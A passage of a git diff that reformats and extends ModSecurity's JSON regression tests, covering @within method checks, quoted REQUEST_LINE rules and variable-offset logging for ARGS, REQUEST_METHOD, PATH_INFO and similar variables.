"audit_log": "", - "error_log": "", "http_code": 418 }, - "rules": [ - "SecRuleEngine On", - "SecDefaultAction \"phase:1,log,deny,status:418,tag:'Host: %{request_headers.host}'\"", - "SecDefaultAction \"phase:2,log,deny,status:418,tag:'Host: %{request_headers.host}'\"", - "SecAction \"id:'900012',phase:request,nolog,pass,t:none,setvar:'tx.allowed_methods=GET HEAD POST OPTIONS'\"", - "SecRule REQUEST_METHOD \"@within %{tx.allowed_methods}\" \"msg:'Method is not allowed by policy',severity:'WARNING',id:'960032',phase:request,block,rev:'2',ver:'OWASP_CRS/3.0.0',maturity:'9',accuracy:'9',tag:'application-multi',tag:'language-multi',tag:'platform-multi',tag:'attack-generic',tag:'OWASP_CRS/POLICY/METHOD_NOT_ALLOWED',tag:'WASCTC/WASC-15',tag:'OWASP_TOP_10/A6',tag:'OWASP_AppSensor/RE1',tag:'PCI/12.1',logdata:'%{matched_var}',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/POLICY/METHOD_NOT_ALLOWED-%{matched_var_name}=%{matched_var}\"" + "rules": [ + "SecRuleEngine On", + "SecDefaultAction \"phase:1,log,deny,status:418,tag:'Host: %{request_headers.host}'\"", + "SecDefaultAction \"phase:2,log,deny,status:418,tag:'Host: %{request_headers.host}'\"", + "SecAction \"id:'900012',phase:request,nolog,pass,t:none,setvar:'tx.allowed_methods=GET HEAD POST OPTIONS'\"", + "SecRule REQUEST_METHOD \"@within %{tx.allowed_methods}\" \"msg:'Method is not allowed by policy',severity:'WARNING',id:'960032',phase:request,block,rev:'2',ver:'OWASP_CRS/3.0.0',maturity:'9',accuracy:'9',tag:'application-multi',tag:'language-multi',tag:'platform-multi',tag:'attack-generic',tag:'OWASP_CRS/POLICY/METHOD_NOT_ALLOWED',tag:'WASCTC/WASC-15',tag:'OWASP_TOP_10/A6',tag:'OWASP_AppSensor/RE1',tag:'PCI/12.1',logdata:'%{matched_var}',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/POLICY/METHOD_NOT_ALLOWED-%{matched_var_name}=%{matched_var}\"" ] -}, -{ - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "!@within appears to fail (3/3)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/960", - "gihub_issue": 960, - "client": { - "ip": "200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 }, - "request": { + { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "!@within appears to fail (3/3)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/960", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { "headers": { - "Host": "www.google.com" + "Host": "www.google.com", + "Content-Length": "0" }, - "uri": "\/test.pl?param1= test ¶m2=test2", - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", - "body": "" - }, + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, "expected": { - "audit_log": "", - "error_log": "", "http_code": 418 }, - "rules": [ - "SecRuleEngine On", - "SecDefaultAction \"phase:1,log,deny,status:418,tag:'Host: %{request_headers.host}'\"", - "SecDefaultAction \"phase:2,log,deny,status:418,tag:'Host: %{request_headers.host}'\"", - "SecAction \"id:'900012',phase:request,nolog,pass,t:none,setvar:'tx.allowed_methods=HEAD POST OPTIONS'\"", - "SecRule REQUEST_METHOD \"!@within %{tx.allowed_methods}\" \"msg:'Method is not allowed by policy',severity:'WARNING',id:'960032',phase:request,block,rev:'2',ver:'OWASP_CRS/3.0.0',maturity:'9',accuracy:'9',tag:'application-multi',tag:'language-multi',tag:'platform-multi',tag:'attack-generic',tag:'OWASP_CRS/POLICY/METHOD_NOT_ALLOWED',tag:'WASCTC/WASC-15',tag:'OWASP_TOP_10/A6',tag:'OWASP_AppSensor/RE1',tag:'PCI/12.1',logdata:'%{matched_var}',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/POLICY/METHOD_NOT_ALLOWED-%{matched_var_name}=%{matched_var}\"" + "rules": [ + "SecRuleEngine On", + "SecDefaultAction \"phase:1,log,deny,status:418,tag:'Host: %{request_headers.host}'\"", + "SecDefaultAction \"phase:2,log,deny,status:418,tag:'Host: %{request_headers.host}'\"", + "SecAction \"id:'900012',phase:request,nolog,pass,t:none,setvar:'tx.allowed_methods=HEAD POST OPTIONS'\"", + "SecRule REQUEST_METHOD \"!@within %{tx.allowed_methods}\" \"msg:'Method is not allowed by policy',severity:'WARNING',id:'960032',phase:request,block,rev:'2',ver:'OWASP_CRS/3.0.0',maturity:'9',accuracy:'9',tag:'application-multi',tag:'language-multi',tag:'platform-multi',tag:'attack-generic',tag:'OWASP_CRS/POLICY/METHOD_NOT_ALLOWED',tag:'WASCTC/WASC-15',tag:'OWASP_TOP_10/A6',tag:'OWASP_AppSensor/RE1',tag:'PCI/12.1',logdata:'%{matched_var}',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/POLICY/METHOD_NOT_ALLOWED-%{matched_var_name}=%{matched_var}\"" ] -} + } ] diff --git a/test/test-cases/regression/misc-variable-under-quotes.json b/test/test-cases/regression/misc-variable-under-quotes.json index c455b69dec..d2745cfc80 100644 --- a/test/test-cases/regression/misc-variable-under-quotes.json +++ b/test/test-cases/regression/misc-variable-under-quotes.json @@ -1,79 +1,90 @@ -[ - { - "enabled":1, - "version_min":300000, - "title":"Testing Variables (quoted) :: REQUEST_LINE - contains (1/2)", - "client":{ - "ip":"200.249.12.31", - "port":123 +[ + { + "enabled": 1, + "version_min": 300000, + "title": "Testing Variables (quoted) :: REQUEST_LINE - contains (1/2)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"t:lowercase:" + "expected": { + "debug_log": "t:lowercase:", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRule \"REQUEST_LINE\" \"@contains index.php/admin/cms/wysiwyg/directive/\" \"id:1,phase:1,t:lowercase,ctl:auditLogParts=+E\"" ] }, - { - "enabled":1, - "version_min":300000, - "title":"Testing Variables (quoted) :: REQUEST_LINE - regex (2/2)", - "client":{ - "ip":"200.249.12.31", - "port":123 + { + "enabled": 1, + "version_min": 300000, + "title": "Testing Variables (quoted) :: REQUEST_LINE - regex (2/2)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"t:lowercase:" + "expected": { + "debug_log": "t:lowercase:", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRule \"REQUEST_LINE\" \"index.php/admin/cms/wysiwyg/directive/\" \"id:1,t:lowercase,ctl:auditLogParts=+E\"" ] } ] - diff --git a/test/test-cases/regression/misc.json b/test/test-cases/regression/misc.json index f089459927..a61fec9785 100644 --- a/test/test-cases/regression/misc.json +++ b/test/test-cases/regression/misc.json @@ -1,15 +1,40 @@ [ { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing action :: SecRule directives should be case insensitive", - "expected":{ - "audit_log":"", - "debug_log":"Executing operator \"Contains\" with param \"PHPSESSID\" against REQUEST_HEADERS.", - "error_log":"" + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: SecRule directives should be case insensitive", + "client": { + "ip": "", + "port": 0 }, - "rules":[ + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Content-Length": "0" + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Executing operator \"Contains\" with param \"PHPSESSID\" against REQUEST_HEADERS.", + "http_code": 200 + }, + "rules": [ "secruleengine On", "secrule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:1,t:lowercase,t:none,msg:'This is a test, %{REQUEST_HEADERS:Accept}%'\"", "secrule TX \"@contains to_test\" \"id:2,t:lowercase,t:none\"" diff --git a/test/test-cases/regression/offset-variable.json b/test/test-cases/regression/offset-variable.json index 7ffe9299ba..6ee6d61ad4 100644 --- a/test/test-cases/regression/offset-variable.json +++ b/test/test-cases/regression/offset-variable.json @@ -1,1137 +1,1520 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Variable offset - ARGS", - "request":{ - "headers":{ - "Host":"localhost", - "Content-Length": "27", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - ARGS", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", + "Content-Length": "0", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param1=value1¶m2=value1", - "method":"GET" + "uri": "/index.html?param1=value1¶m2=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"o0,3v23,6t:trim" + "expected": { + "error_log": "o0,3v23,6t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRule ARGS \"@rx val\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - ARGS_GET", - "request":{ - "headers":{ - "Host":"localhost", - "Content-Length": "27", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - ARGS_GET", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", + "Content-Length": "0", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param1=value1¶m2=value2", - "method":"GET" + "uri": "/index.html?param1=value1¶m2=value2", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"o3,3v37,6t:trim" + "expected": { + "error_log": "o3,3v37,6t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRule ARGS_GET \"@rx ue2\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - ARGS_POST 1", - "request":{ - "headers":{ - "Host":"localhost", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - ARGS_POST 1", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param1=value1¶m2=value1", - "method":"POST", - "body":[ + "uri": "/index.html?param1=value1¶m2=value1", + "method": "POST", + "body": [ "param1=value1¶m2=value1" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"o3,3v142,6t:trim" + "expected": { + "error_log": "o3,3v142,6t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule ARGS_POST \"@rx ue1\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - ARGS_POST 2", - "request":{ - "headers":{ - "Host":"localhost", - "Content-Length": "27", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - ARGS_POST 2", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", + "Content-Length": "41", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param1=value1¶m2=value1", - "method":"POST", - "body":[ + "uri": "/index.html?param1=value1¶m2=value1", + "method": "POST", + "body": [ "param1=value1¶m2=value2¶m3=value3" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"o3,3v156,6t:trim" + "expected": { + "error_log": "o3,3v156,6t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule ARGS_POST \"@rx ue2\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - ARGS_GET_NAMES 1", - "request":{ - "headers":{ - "Host":"localhost", - "Content-Length": "27", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - ARGS_GET_NAMES 1", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", + "Content-Length": "41", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param1=value1¶m2=value1", - "method":"POST", - "body":[ + "uri": "/index.html?param1=value1¶m2=value1", + "method": "POST", + "body": [ "param1=value1¶m2=value2¶m3=value3" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"o0,6v17,6t:trim" + "expected": { + "error_log": "o0,6v17,6t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule ARGS_GET_NAMES \"@rx param1\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - ARGS_GET_NAMES 2", - "request":{ - "headers":{ - "Host":"localhost", - "Content-Length": "27", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - ARGS_GET_NAMES 2", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", + "Content-Length": "41", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param1=value1¶m2=value1", - "method":"POST", - "body":[ + "uri": "/index.html?param1=value1¶m2=value1", + "method": "POST", + "body": [ "param1=value1¶m2=value2¶m3=value3" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"o0,6v31,6t:trim" + "expected": { + "error_log": "o0,6v31,6t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule ARGS_GET_NAMES \"@rx param2\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - ARGS_GET_NAMES 3", - "request":{ - "headers":{ - "Host":"localhost", - "Content-Length": "27", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - ARGS_GET_NAMES 3", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", + "Content-Length": "41", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param1=value1¶m2=value1", - "method":"POST", - "body":[ + "uri": "/index.html?param1=value1¶m2=value1", + "method": "POST", + "body": [ "param1=value1¶m2=value2¶m3=value3" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ + "expected": { + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule ARGS_GET_NAMES \"@rx am1 par\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - ARGS_GET_NAMES 4", - "request":{ - "headers":{ - "Host":"localhost", - "Content-Length": "27", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - ARGS_GET_NAMES 4", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", + "Content-Length": "41", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"POST", - "body":[ + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "POST", + "body": [ "param1=value1¶m2=value2¶m3=value3" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ + "expected": { + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule ARGS_GET_NAMES \"@rx am1 param2 par\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - ARGS_POST_NAMES", - "request":{ - "headers":{ - "Host":"localhost", - "Content-Length": "27", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - ARGS_POST_NAMES", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", + "Content-Length": "41", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"POST", - "body":[ + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "POST", + "body": [ "param1=value1¶m2=value2¶m3=value3" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log": "0,6v149,6t:trim" + "expected": { + "error_log": "0,6v149,6t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule ARGS_POST_NAMES \"@rx param1\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - ARGS_NAMES", - "request":{ - "headers":{ - "Host":"localhost", - "Content-Length": "27", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - ARGS_NAMES", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", + "Content-Length": "41", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"POST", - "body":[ + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "POST", + "body": [ "param1=value1¶m2=value2¶m3=value3" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"o0,6v17,6t:trim" + "expected": { + "error_log": "o0,6v17,6t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule ARGS_NAMES \"@rx param1\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, - { - "enabled":1, - "version_min":300000, - "title":"Variable offset - ARGS_COMBINED_SIZE 1", - "request":{ - "headers":{ - "Host":"localhost", - "Content-Length": "27", + { + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - ARGS_COMBINED_SIZE 1", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", + "Content-Length": "0", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET" + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"v16,6v23,6v30,6v37,6v44,6v51,6t:trim" + "expected": { + "error_log": "v16,6v23,6v30,6v37,6v44,6v51,6t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule ARGS_COMBINED_SIZE \"@gt 1\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] - }, - { - "enabled":1, - "version_min":300000, - "title":"Variable offset - ARGS_COMBINED_SIZE 2", - "request":{ - "headers":{ - "Host":"localhost", - "Content-Length": "27", + }, + { + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - ARGS_COMBINED_SIZE 2", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", + "Content-Length": "0", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET" + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"v16,6v23,6v30,6v37,6v44,6v51,6t:trim" + "expected": { + "error_log": "v16,6v23,6v30,6v37,6v44,6v51,6t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule ARGS_COMBINED_SIZE \"@gt 1\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, - { - "enabled":1, - "version_min":300000, - "title":"Variable offset - REQUEST_LINE", - "request":{ - "headers":{ - "Host":"localhost", - "Content-Length": "27", + { + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - REQUEST_LINE", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", + "Content-Length": "0", "Content-Type": "application/x-www-form-urlencoded", "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET" + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"o23,6v0,63t:trim" + "expected": { + "error_log": "o23,6v0,63t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_LINE \"value1\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, - { - "enabled":1, - "version_min":300000, - "title":"Variable offset - REQUEST_METHOD", - "request":{ - "headers":{ - "Host":"localhost", - "Content-Length": "27", + { + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - REQUEST_METHOD", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", + "Content-Length": "0", "Content-Type": "application/x-www-form-urlencoded", "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET", - "http_version": 1.1 + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"o0,3v0,3t:trim" + "expected": { + "error_log": "o0,3v0,3t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_METHOD \"GET\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - REQUEST_PROTOCOL", - "request":{ - "headers":{ - "Host":"localhost", - "Content-Length": "27", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - REQUEST_PROTOCOL", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", + "Content-Length": "0", "Content-Type": "application/x-www-form-urlencoded", "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET", - "http_version": 1.1 + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"o5,3v58,8t:trim" + "expected": { + "error_log": "o5,3v58,8t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule REQUEST_PROTOCOL \"1.1\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - PATH_INFO", - "request":{ - "headers":{ - "Host":"localhost", - "Content-Length": "27", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - PATH_INFO", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", + "Content-Length": "0", "Content-Type": "application/x-www-form-urlencoded", "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==" }, - "uri":"/index.html?param1=value1¶m2=value1¶m3=value1", - "method":"GET", - "http_version": 1.1 + "uri": "/index.html?param1=value1¶m2=value1¶m3=value1", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - 